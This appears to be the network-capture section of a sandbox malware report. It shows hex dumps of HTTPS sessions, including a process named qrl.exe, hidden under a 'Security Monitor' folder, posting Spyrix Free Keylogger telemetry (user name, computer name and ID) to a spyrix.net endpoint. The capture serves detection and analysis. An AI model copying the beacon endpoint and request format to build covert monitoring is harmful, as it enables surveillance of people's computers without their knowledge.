                                                                                                                                                                                                                                                          Expires: -1
                                                                                                                                                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                          ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                                                                                          MS-CorrelationId: bf54724d-71ed-4056-b6b3-bd2228e46852
                                                                                                                                                                                                                                                          MS-RequestId: f3c07320-d874-48c0-813d-09db5e91a682
                                                                                                                                                                                                                                                          MS-CV: /ehD+UkpgUKBx8ke.0
                                                                                                                                                                                                                                                          X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:26:26 GMT
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 30005
                                                                                                                                                                                                                                                          2024-10-02 04:26:27 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                                                                                          Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                                                                                          2024-10-02 04:26:27 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                                                                                          Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          7192.168.2.755009158.69.117.1194434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:22 UTC663OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                          Host: dashboard.spyrix.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:22 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:22 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          X-Frame-Options: DENY
                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000;
                                                                                                                                                                                                                                                          X-State: 3.0
                                                                                                                                                                                                                                                          2024-10-02 04:28:22 UTC650INData Raw: 32 37 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 72 65 6c 3d 22 69 63 6f 6e 22 0a 20 20 20 20 68 72 65 66 3d 22 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 0a 20 20 2f 3e 0a 20 20 3c 6d 65 74 61 0a 20 20 20 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65
                                                                                                                                                                                                                                                          Data Ascii: 27e<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8" /> <link rel="icon" href="/favicon.ico" /> <meta name="viewport" content="width=device-width, initial-scale=1.0" /> <meta name="robots" content="noinde


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          8192.168.2.755013158.69.117.1194433020C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:22 UTC166OUTPOST /dashboard/prg-actions HTTP/1.1
                                                                                                                                                                                                                                                          Host: spyrix.net
                                                                                                                                                                                                                                                          User-Agent: curl/7.64.0
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Content-Length: 429
                                                                                                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                          2024-10-02 04:28:22 UTC429OUTData Raw: 26 61 63 74 69 6f 6e 3d 61 70 70 3a 4d 6f 6e 69 74 6f 72 69 6e 67 3a 53 74 61 72 74 42 75 74 74 6f 6e 26 64 61 74 61 3d 26 70 72 67 5f 69 64 3d 53 70 79 72 69 78 20 46 72 65 65 20 4b 65 79 6c 6f 67 67 65 72 26 70 72 67 5f 76 65 72 3d 31 31 2e 36 2e 32 32 26 75 73 65 72 5f 6e 61 6d 65 3d 66 72 6f 6e 74 64 65 73 6b 26 75 73 65 72 3d 26 63 6f 6d 70 5f 6e 61 6d 65 3d 33 37 37 31 34 32 26 63 6f 6d 70 5f 69 64 3d 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 5f 32 34 31 30 30 32 30 31 35 36 32 35 26 63 6f 6d 70 5f 74 69 6d 65 3d 32 30 32 34 2d 31 30 2d 30 32 20 30 31 3a 35 38 3a 33 37 2e 38 30 30 26 70 72 67 5f 6c 6e 67 3d 65 6e 67 6c 69 73 68 26 6f 73 5f 63 61 70 74 69 6f 6e 3d 20 28 29 26 6f 73 5f
                                                                                                                                                                                                                                                          Data Ascii: &action=app:Monitoring:StartButton&data=&prg_id=Spyrix Free Keylogger&prg_ver=11.6.22&user_name=user&user=&comp_name=377142&comp_id=9e146be9-c76a-4720-bcdb-53011b87bd06_241002015625&comp_time=2024-10-02 01:58:37.800&prg_lng=english&os_caption= ()&os_
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC170INHTTP/1.1 201 Created
                                                                                                                                                                                                                                                          Server: nginx/1.17.3
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:23 GMT
                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          9192.168.2.75501595.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC574OUTGET /dashboard30/assets/index-93c74fef.css HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: text/css,*/*;q=0.1
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: style
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC314INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:23 GMT
                                                                                                                                                                                                                                                          Content-Type: text/css
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: W/"66fa817d-ef8c"
                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-02T03:24:12+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc28
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC3782INData Raw: 33 39 62 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 ed 7d 7b 73 23 b9 91 e7 ff f7 29 b8 d3 e1 08 c9 a7 62 f3 fd 52 ec 86 e7 e1 59 af 6f ed f5 7b 6f ec 98 53 14 ab 8a 22 2d 8a d4 90 54 4b 3d 3a dd 67 bf 5f 26 32 f1 28 a0 48 aa a7 1d 77 17 71 d3 ee b6 54 85 4a 24 f2 8d 44 02 f8 45 b1 cc 77 fb ea d0 fa e2 cf 7f fa 36 9b 7c 71 fd 8b c5 76 73 c8 16 79 51 bd c8 4f f7 ab f5 c7 d9 6f 1f 37 ab c3 f6 7a bf 2b 66 8f bb f5 c5 f2 70 78 d8 cf de bf 2f ca 4d 1b 7f cb ed d3 66 bd cd cb f6 a6 3a bc 2f f3 fd 72 be cd 77 65 bf f3 3e df 03 f6 fe bd f9 3a fb 43 75 fb b8 ce 77 d9 b8 5f 16 79 3e ec b6 9f b6 8b 45 ef 92 a1 ae b7 45 be be f8 e2 77 db 87 87 d5 66 ff c5 e5 d5 67 ef a6 b5 d8 ee ee f3 c3 c5 17 d4 eb 17 97 d7 3c bc a7 6a 75 bb 3c cc fa 9d 4e 6b d8 e9 98 67 fb c3 c7 75 35
                                                                                                                                                                                                                                                          Data Ascii: 39b9}{s#)bRYo{oS"-TK=:g_&2(HwqTJ$DEw6|qvsyQOo7z+fpx/Mf:/rwe>:Cuw_y>EEwfg<ju<Nkgu5
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC4096INData Raw: 71 4f f3 2c fb bd c1 c8 36 c0 06 0f c4 3b 2b d4 7a 97 b2 dc 64 68 a9 f3 cd 4b 2d d5 62 24 d8 25 6a d9 5a 7b f0 9a bf 98 95 23 f3 8d a4 33 2e af d9 5a 97 48 45 23 25 4f 7b 9c b0 87 09 09 7f 14 c4 b5 68 75 8f 23 b2 2e f6 f8 4c a7 d8 e9 d3 c7 56 1f bf c8 b1 dd df bf e6 a6 32 3a 05 dc 4c 98 a2 2e 64 51 fc 5d de 9b ce 17 d5 eb b2 7b b5 ec 5d 2d fb 57 cb c1 d5 72 f8 82 75 ac 5b 84 d2 d8 fd 20 6b 66 1d b4 60 fe cd 3c c9 59 22 b4 f4 19 e4 bd f2 e2 0b 5d 95 ab 91 e9 75 d9 8b 01 22 d8 fc 64 80 ae 92 ce 96 25 ba 62 44 66 86 56 06 4a d9 ea eb b2 1f 63 80 29 ce 27 63 f0 ba 1c c4 00 31 21 3a 0e 50 63 ad 26 3a 99 50 ff 45 f2 85 54 74 e8 ed 24 33 a5 cb c5 e3 6e 8f 95 1c 29 0e 76 4c 43 35 a6 f0 11 8b ae 24 4e a6 d6 97 33 e0 02 90 e4 60 9d 3f 60 69 44 7f 90 95 53 69 5a 5e
                                                                                                                                                                                                                                                          Data Ascii: qO,6;+zdhK-b$%jZ{#3.ZHE#%O{hu#.LV2:L.dQ]{]-Wru[ kf`<Y"]u"d%bDfVJc)'c1!:Pc&:PETt$3n)vLC5$N3`?`iDSiZ^
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC4096INData Raw: 27 a8 f8 21 15 42 3b 6c 79 3d 4f bf 00 b3 ce 91 84 ed b3 69 0b 44 fa 7c 22 91 65 53 43 5f 0d 03 34 35 60 be 7e 28 25 15 e0 4c f3 4c 6d 79 d3 34 0c c6 32 c2 3d a0 49 df 89 d3 69 b0 69 8c 3d fe 7e 7a 5f ed 5a 82 cb 89 9f 07 3e 14 1f ef c2 54 be 28 d5 dc 9f 5a 7d 65 ce f0 55 00 72 6f a6 bd 46 b5 95 13 e3 37 a8 1e 8c b9 1a 50 86 4e 10 d6 64 97 24 d7 62 06 34 7b a7 17 9f 83 6a df 9d ff 21 e8 0d d6 da f3 ba dc ea 0c d9 8b 11 7b 63 84 3f ef d7 c2 22 2f e8 3b 17 78 5a 3a 22 91 90 00 77 80 b2 57 ba 6d d7 06 62 a7 7b 6c 96 91 a6 4e 8e 8a c8 bf 52 f5 47 76 86 9c 34 e2 79 5a 3e cc 3c a6 49 b6 3f 3f c5 da ab 4d b8 98 a7 c3 fb de 2e 9c b4 c7 8a 36 a7 cb 13 77 d2 d1 2a 0d 4e 88 c8 1b cd e3 bb 45 51 74 c7 28 a1 72 37 ef 06 ca 17 52 f6 a5 f3 b3 26 b3 6d 8f 3d bc 7c c5 46
                                                                                                                                                                                                                                                          Data Ascii: '!B;ly=OiD|"eSC_45`~(%LLmy42=Iii=~z_Z>T(Z}eUroF7PNd$b4{j!{c?"/;xZ:"wWmb{lNRGv4yZ><I??M.6w*NEQt(r7R&m=|F
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC2811INData Raw: 52 64 24 61 1c cd 1e 2b 75 94 6b 4c ea 9e 1a d2 71 9f 18 8c e7 df 69 b9 35 48 01 99 8c b0 57 c9 40 6a 32 eb b6 ba a4 f6 d6 64 20 ae 20 d0 94 d0 3d 2c b3 60 c7 a2 1b 5e a0 6d be a9 56 a3 a2 fb 5a 94 78 67 00 ad 95 99 e6 87 c3 ee 82 73 8d 07 5c 08 bc 4e 69 54 4c 55 93 bb e6 62 0c 92 b9 ac cb f5 8f 56 b4 6a b3 1e 9d 01 b8 1c ac 9a 19 0a 48 89 6f b1 f5 f3 93 4a 1e b1 79 66 41 d9 43 8f bc 9c 1b e0 d9 1e 57 f7 d9 4d 60 4a 0b be 0d a3 44 ba 68 f3 18 49 a5 10 43 e9 6c ea 80 49 05 68 6b 9d 9b 1b 2f a6 9d c9 b4 37 3c 23 5d e2 6c a9 31 63 0d 70 ec c9 49 d2 de d3 0a 13 30 ba 6b f0 1c 36 ad 36 2e ce 33 d7 07 1c 40 6b 1d 8c 43 8e 5d b0 49 06 b0 1a c3 74 5c aa a9 ab f5 e0 63 57 cb 26 39 78 4a 16 0e cf 12 e2 17 ae e3 9d 03 d2 18 91 2b b6 b9 86 34 d2 79 3b b4 82 0e 07 67
                                                                                                                                                                                                                                                          Data Ascii: Rd$a+ukLqi5HW@j2d =,`^mVZxgs\NiTLUbVjHoJyfACWM`JDhIClIhk/7<#]l1cpI0k66.3@kC]It\cW&9xJ+4y;g
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          10192.168.2.75501495.181.182.1824434240C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC594OUTGET /dashboard30/assets/index-004f4025.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: cdn.cdndownload.net
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://dashboard.spyrix.com/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC405INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Date: Wed, 02 Oct 2024 04:28:23 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Last-Modified: Mon, 30 Sep 2024 10:46:21 GMT
                                                                                                                                                                                                                                                          ETag: W/"66fa817d-135fd2"
                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: https://dashboard.spyrix.com
                                                                                                                                                                                                                                                          Cache: STALE
                                                                                                                                                                                                                                                          X-Cached-Since: 2024-10-01T20:39:52+00:00
                                                                                                                                                                                                                                                          X-Node: m9-up-gc229
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC3691INData Raw: 35 36 35 66 0d 0a 1f 8b 08 00 00 00 00 00 04 03 c4 bd 0d 73 db 46 96 f7 fb 55 24 96 56 4b 8e 61 c5 ca cc ce ce 80 86 59 8c 2c c7 9a d8 4e 1c db 8a 12 45 cb 50 24 24 d1 a6 08 86 20 25 33 92 9e cf 7e 7f ff d3 2f 00 29 79 36 cf ad ba 75 ab 6c 11 68 34 fa e5 f4 e9 f3 de 07 57 fd d9 c6 de 41 f6 fd e9 c7 7c 30 df 19 e6 67 a3 49 fe c3 ac 98 e6 b3 f9 b2 7d c5 c3 83 83 ac 99 27 dd 64 de ca 9e 75 37 46 93 8d bc b3 77 60 25 37 f9 64 71 99 cf fa a7 e3 3c dd 7c 92 0c 8a c9 d9 e8 7c 11 ef af 67 a3 79 78 76 d5 1f 2f f2 74 7e d7 4a f3 e3 ee 49 36 b7 96 7f 9c 54 2d 37 0f d4 e6 7c 39 cd 8b b3 8d ee 66 d6 28 97 97 a7 c5 b8 d1 e9 3e 6a 34 52 f5 ce bf 76 f3 6c 31 19 cc 47 c5 a4 d9 ba a1 bb 72 be d1 cd 86 c5 80 51 4c e6 3b 83 59 de 9f e7 fb e3 5c 77 cd c6 78 34 f9 d4 68 ed cc
                                                                                                                                                                                                                                                          Data Ascii: 565fsFU$VKaY,NEP$$ %3~/)y6ulh4WA|0gI}'du7Fw`%7dq<||gyxv/t~JI6T-7|9f(>j4Rvl1GrQL;Y\wx4h
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC4096INData Raw: f8 42 dc 19 97 b3 5c 57 c1 67 2a 95 2c 70 a6 ef a7 d2 7b cb f8 4c ba cd 66 50 6a fc bb 48 f1 e5 45 b1 18 0f 7f 64 59 f3 19 43 1a 8e 70 b4 4b bf 2a b1 46 dd e9 1d cf d9 77 2e 64 af 8d ae 99 66 63 58 5c a6 8e f0 b8 97 1b 70 96 04 cf 46 bd c1 e0 8c 74 23 c5 10 1e 1a f3 83 7c 4f 3f 92 6a c4 9a 86 d8 c7 6d 41 86 c9 68 98 e6 e3 6a 33 0f b5 42 ad 0e 8a ea b0 95 da 4d 52 ef c4 5c c2 ad b6 b6 e2 0c ec e9 31 30 9b eb 0c bd 27 bb c9 c7 af fb d3 f4 26 1a 0b 52 a2 0a bc 8b de fb e6 93 68 54 e0 99 ae ef 60 55 d1 d3 3e 94 17 cd a4 63 e8 d0 45 8e 3b fe 24 08 33 67 59 73 91 41 ae 4d a7 72 64 04 e1 7f 08 ff 5f 29 5a c0 59 f0 9a 23 aa d7 9a 9d 7a e7 dc d9 49 e0 d3 3d 64 c4 da a4 7b 0f a3 25 2e c6 d9 8e cd e9 78 ba 8a 62 4e 78 ba 40 35 85 9a 00 2b 07 6a 10 7e da 6a 9d 64 53
                                                                                                                                                                                                                                                          Data Ascii: B\Wg*,p{LfPjHEdYCpK*Fw.dfcX\pFt#|O?jmAhj3BMR\10'&RhT`U>cE;$3gYsAMrd_)ZY#zI=d{%.xbNx@5+j~jdS
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC4096INData Raw: d8 de 20 2a 4c d9 e9 91 a3 9b 2b 53 3a cd 17 96 c2 4f 1c 4e 22 1d aa cc 98 ff a4 d5 b9 e0 18 43 2b a5 45 fc 67 b4 58 d6 44 07 b3 7e 96 2d 97 d2 82 d3 3b 21 f2 bc 6b 6a 9f fa 37 10 7a 0b 33 e1 af 94 18 09 8a 25 c1 74 df 03 99 db cd ce e6 f1 ff 34 4f fe f2 6b 4b f8 7c 4e 51 da 3c fe 9f 93 47 ad af 92 a9 90 fd ab 5f ff c2 ed 5f 3a bf fe e5 d7 af be 3a af 66 cb 08 57 dd b5 9e ad 55 9b 69 ca 46 60 17 38 fe d8 5b 56 9e 0c 19 e2 18 54 ed b4 0f 71 fa 76 30 e1 7c 49 74 be b7 de 3f 83 c5 c8 5f 01 81 f2 f1 9e 27 d9 e4 78 37 dc 20 2d 22 93 56 ec fa 47 01 fd 46 40 ee 12 d0 af 49 3b 30 40 a5 5d 74 11 25 6e 61 fe cc 62 a8 35 d6 83 d1 68 10 8f b2 c9 23 9d 99 88 8a b5 83 a7 1a f2 d2 81 2c d2 b9 6d 2b 57 7f 6e f5 03 e2 62 bf b0 03 16 d5 68 2f 0d 7a 0c 69 33 0f cb 22 89 42
                                                                                                                                                                                                                                                          Data Ascii: *L+S:ON"C+EgXD~-;!kj7z3%t4OkK|NQ<G__::fWUiF`8[VTqv0|It?_'x7 -"VGF@I;0@]t%nab5h#,m+Wnbh/zi3"B
                                                                                                                                                                                                                                                          2024-10-02 04:28:23 UTC4096INData Raw: d5 dd b0 71 de de 5a 67 55 df c8 3b 34 e7 e0 83 f4 15 c6 29 85 c8 63 60 b7 43 1d e4 ce 9a 6d e9 97 fa 94 af 19 10 1f 46 41 4c 11 ee 35 44 64 b0 43 b9 16 f7 2c 56 d5 96 b3 63 68 c6 09 8b 2d 53 db 5c 99 a1 48 5a 4b c7 98 f7 34 1c e7 d3 40 75 8f 32 34 13 91 e3 40 f2 a9 7e 9d ab a2 8e c4 5d 5e 14 a5 5a 55 0f 24 42 52 5d d1 42 58 90 c9 33 12 b7 0e 16 89 2f 80 11 1a c4 ca 8b 54 c6 ca 7f 54 75 37 ce 18 8a 31 a1 f8 74 50 c7 73 f7 b8 fe b2 95 54 82 88 75 0c e9 13 aa fd 22 3c 93 a1 d7 a2 2e 7e 59 ba 75 08 51 17 12 10 25 5a f8 a8 12 bf bc c1 d1 26 28 38 1b 82 f3 79 05 a2 7b 16 fd 93 52 fc 0e c5 60 10 f2 ba a9 2d a2 af 6a 6c c7 4a f7 14 a6 64 c1 14 56 56 89 35 2c 84 89 35 f5 37 ee 40 ff 0d 57 af c6 13 ee 0f f1 f6 16 24 ed a2 76 81 6b e8 50 dd 5a ff a6 d5 b8 37 c2 e8
                                                                                                                                                                                                                                                          Data Ascii: qZgU;4)c`CmFAL5DdC,Vch-S\HZK4@u24@~]^ZU$BR]BX3/TTu71tPsTu"<.~YuQ%Z&(8y{R`-jlJdVV5,57@W$vkPZ7
                                                                                                                                                                                                                                                          2024-10-02 04:28:24 UTC4096INData Raw: 96 e1 54 67 6f 44 81 74 f8 4b 9c 69 8c 17 e3 1f f8 37 90 9d 80 15 e8 09 2d d4 51 af ba c1 6f 4f 26 72 37 44 f2 b2 8e 4a 9f 5f 4d b9 4d 47 e5 ab bc 7f c5 d7 f7 dc 8d e7 81 fe 9e 20 4b 3d 3a 7c 83 6d ae 34 bf 29 a1 69 51 e5 be 9e 5b e0 00 79 d8 63 8b 90 47 c0 7f 3a ab 1e 54 0d ba 67 21 dc e2 05 4e 93 17 3e 01 96 fb 78 f6 49 72 c0 d9 11 59 fe 7c e6 94 44 1f cf 22 ca d3 a7 03 e6 18 ca ac 54 c6 fa 61 2c 29 26 2e 35 dc 3e 38 30 4b 5f 28 7f 5c ed b2 7b 46 69 ed de 2e f7 b4 f6 9c 5b 1c ba ea ee 7d 81 20 77 05 b5 4b 7b bf 76 6f 97 0f be df 75 03 b5 01 ac 5c 6b 04 2b 05 56 b1 de c6 5d f2 cd 69 76 83 36 c2 67 a0 be 21 f8 0f 51 ce 6b 3f 9c bb 91 7a 92 1e ec 3b e3 01 a4 e7 c6 e9 e6 dd 98 ce 97 6c 46 d8 f7 91 b5 b4 c2 46 78 cb 3a c9 73 4b 2e f2 eb e3 0a a0 72 38 6f c3
                                                                                                                                                                                                                                                          Data Ascii: TgoDtKi7-QoO&r7DJ_MMG K=:|m4)iQ[ycG:Tg!N>xIrY|D"Ta,)&.5>80K_(\{Fi.[} wK{vou\k+V]iv6g!Qk?z;lFFx:sK.r8o
